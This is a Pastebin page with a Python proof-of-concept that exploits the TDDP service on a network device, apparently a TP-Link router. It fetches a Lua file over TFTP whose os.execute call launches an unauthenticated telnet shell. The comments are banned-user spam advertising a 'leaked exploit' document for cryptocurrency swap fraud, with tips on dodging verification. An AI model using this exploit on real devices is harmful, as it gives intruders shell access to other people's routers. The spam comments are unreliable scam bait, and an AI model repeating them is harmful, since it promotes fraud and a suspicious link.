Guest User

Untitled

a guest
Mar 27th, 2019
15,474
0
Never
4
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.95 KB | None | 0 0
  1. #!/usr/bin/python3
  2.  
  3. # Create /testfile in your tftp root directory with the following contents:
  4. #
  5. #function config_test(config)
  6. # os.execute("telnetd -l /bin/login.sh")
  7. #end
  8. #
  9. # Replace 192.168.0.1 with the IP address of the vulnerable device
  10.  
  11. import binascii
  12. import socket
  13.  
  14. port_send = 1040
  15. port_receive = 61000
  16.  
  17. tddp_ver = "01"
  18. tddp_command = "31"
  19. tddp_req = "01"
  20. tddp_reply = "00"
  21. tddp_padding = "%0.16X" % 00
  22.  
  23. tddp_packet = "".join([tddp_ver, tddp_command, tddp_req, tddp_reply, tddp_padding])
  24.  
  25. sock_receive = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  26. sock_receive.bind(('', port_receive))
  27.  
  28. # Send a request
  29. sock_send = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  30. packet = binascii.unhexlify(tddp_packet)
  31. packet = packet + b"/testfile;arbitrary"
  32. print(packet)
  33. sock_send.sendto(packet, ("192.168.0.1", port_send))
  34. sock_send.close()
  35.  
  36. response, addr = sock_receive.recvfrom(1024)
  37. r = response.encode('hex')
  38. print(r)
Advertisement
Comments
  • yoesf395
    67 days
    # CSS 0.84 KB | 0 0
    1. ✅ Leaked Exploit Documentation:
    2.  
    3. https://docs.google.com/document/d/1dOCZEHS5JtM51RITOJzbS4o3hZ-__wTTRXQkV1MexNQ/edit?usp=sharing
    4.  
    5. This made me $13,000 in 2 days.
    6.  
    7. Important: If you plan to use the exploit more than once, remember that after the first successful swap you must wait 24 hours before using it again. Otherwise, there is a high chance that your transaction will be flagged for additional verification, and if that happens, you won't receive the extra 38% — they will simply correct the exchange rate.
    8. The first COMPLETED transaction always goes through — this has been tested and confirmed over the last days.
    9.  
    10. Edit: I've gotten a lot of questions about the maximum amount it works for — as far as I know, there is no maximum amount. The only limit is the 24-hour cooldown (1 use per day without verification from Swapzone — instant swap).
  • User was banned
  • Termozak
    50 days
    # CSS 0.85 KB | 0 0
    1. ✅ Leaked Exploit Documentation:
    2.  
    3. https://docs.google.com/document/d/1dOCZEHS5JtM51RITOJzbS4o3hZ-__wTTRXQkV1MexNQ/edit?usp=sharing
    4.  
    5. This made me $13,000 in 2 days.
    6.  
    7. Important: If you plan to use the exploit more than once, remember that after the first successful swap you must wait 24 hours before using it again. Otherwise, there is a high chance that your transaction will be flagged for additional verification, and if that happens, you won't receive the extra 25% — they will simply correct the exchange rate.
    8. The first COMPLETED transaction always goes through — this has been tested and confirmed over the last days.
    9.  
    10. Edit: I've gotten a lot of questions about the maximum amount it works for — as far as I know, there is no maximum amount. The only limit is the 24-hour cooldown (1 use per day without verification from SimpleSwap — instant swap).
  • User was banned
Add Comment
Please, Sign In to add comment